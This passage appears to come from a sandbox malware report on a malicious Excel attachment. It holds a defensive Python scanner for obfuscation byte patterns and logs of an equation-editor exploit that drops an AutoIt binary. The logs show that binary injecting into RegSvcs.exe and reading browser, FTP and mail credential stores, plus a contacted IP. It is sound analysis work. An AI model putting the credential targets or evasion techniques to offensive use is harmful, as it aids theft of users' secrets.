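        rb"\x64(?:\xA1|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")),
]

# Constructed sample buffer (NOT bytes from the analysed sample): NOPs around
# one instance of each shape the report lists.
SAMPLE = bytes.fromhex(
    "90 90 51 C3"             # push ecx; ret
    "55 C3 57 C3"             # push ebp; ret / push edi; ret
    "64 A1 30 00 00 00"       # mov eax, dword ptr fs:[30h]
    "64 8B 15 30 00 00 00"    # mov edx, dword ptr fs:[30h]
    "0E CF"                   # push cs; iretd
    "53 CB"                   # push ebx; retf
    "C3 90"
)


def _describe(kind: str, raw: bytes) -> str:
    """Render a matched byte run as the instruction pair it encodes."""
    if kind == "push_ret":
        return f"push {REG32[raw[0] - 0x50]}; ret"
    if kind == "push_retf":
        return f"push {REG32[raw[0] - 0x50]}; retf"
    if kind == "push_cs_iretd":
        return "push cs; iretd"
    reg = "eax" if raw[1] == 0xA1 else REG32[(raw[2] >> 3) & 7]
    return f"mov {reg}, dword ptr fs:[30h]"


def scan_gadgets(buf: bytes) -> list:
    """Return every match as {offset, kind, bytes, asm}, ordered by offset.

    This is a byte scan with no notion of instruction boundaries, exactly like
    the sandbox heuristic: a hit can sit inside data or straddle two real
    instructions, so confirm each one in a disassembler before reporting it.
    """
    hits = []
    for kind, pat in PATTERNS:
        for m in pat.finditer(buf):
            hits.append({"offset": m.start(), "kind": kind,
                         "bytes": m.group().hex(" "),
                         "asm": _describe(kind, m.group())})
    return sorted(hits, key=lambda h: h["offset"])


def summarize(buf: bytes) -> dict:
    """Count hits per pattern kind; useful as a quick obfuscation score."""
    counts = {}
    for h in scan_gadgets(buf):
        counts[h["kind"]] = counts.get(h["kind"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in scan_gadgets(SAMPLE):
        print(f"0x{h['offset']:04x}  {h['bytes']:<22} {h['asm']}")
    print(summarize(SAMPLE))
```

Point it at a dumped code section (for example the .raw.unpack regions the report names) with scan_gadgets(open(path, "rb").read()). A handful of push/ret pairs is normal in hand-written or compiler-generated code; dozens clustered in one region, as in OIU.exe at 0x00C35959 to 0x00C35978, are the signal.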

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\OIU.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\OIU.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00C01201
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BE2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,3_2_00BE2BA5
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C0B226 SendInput,keybd_event,3_2_00C0B226
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C222DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,3_2_00C222DA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\OIU.exe C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\OIU.exe
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Users\user\AppData\Roaming\OIU.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\OIU.exe"
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C00B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,3_2_00C00B62
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C01663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,3_2_00C01663
Source: OIU.exe, 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, OIU.exe, 00000005.00000002.460606758.0000000000C62000.00000002.00000001.01000000.00000003.sdmp, OIU.exe, 00000007.00000002.462376240.0000000000C62000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: OIU.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BC0698 cpuid 3_2_00BC0698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: GetLocaleInfoA,12_2_00417A20
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BD333F GetSystemTimeAsFileTime,3_2_00BD333F
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BFD27A GetUserNameW,3_2_00BFD27A
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BDB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,3_2_00BDB952
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00BA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,3_2_00BA42DE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2220, type: MEMORYSTR
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: OIU.exe | Binary or memory string: WIN_81
Source: OIU.exe | Binary or memory string: WIN_XP
Source: OIU.exe.2.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: OIU.exe | Binary or memory string: WIN_XPe
Source: OIU.exe | Binary or memory string: WIN_VISTA
Source: OIU.exe | Binary or memory string: WIN_7
Source: OIU.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2220, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2220, type: MEMORYSTR
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.300ee8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.3766458.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.37b7770.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b6f2ae.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.b70196.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 12.2.RegSvcs.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.OIU.exe.de0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.OIU.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.OIU.exe.a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.OIU.exe.6e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.OIU.exe.360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_00C21204
Source: C:\Users\user\AppData\Roaming\OIU.exe | Code function: 3_2_00C21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00C21806
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: 121 Windows Management Instrumentation; 2 Native API; 3 Exploitation for Client Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: 1 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 212 Process Injection; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: 11 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 22 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 212 Process Injection
Credential Access: 2 OS Credential Dumping; 121 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 38 System Information Discovery; 34 Security Software Discovery; 22 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 121 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: 14 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1435095 | Sample: Order Request1_5_24.xlam.xlsx | Startdate: 02/05/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

Process tree (indentation = parent/child; "->" = network contact; "dropped" = file written):

EXCEL.EXE
  EQNEDT32.EXE
    -> 23.94.54.101, 49163, 80 (AS-COLOCROSSINGUS, United States)
    dropped: C:\Users\user\AppData\Roaming\OIU.exe (PE32)
    signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    OIU.exe
      signatures: Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; Found API chain indicative of sandbox detection
      RegSvcs.exe
        signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      OIU.exe
        signatures: Binary is likely a compiled AutoIt script file
        RegSvcs.exe
        OIU.exe
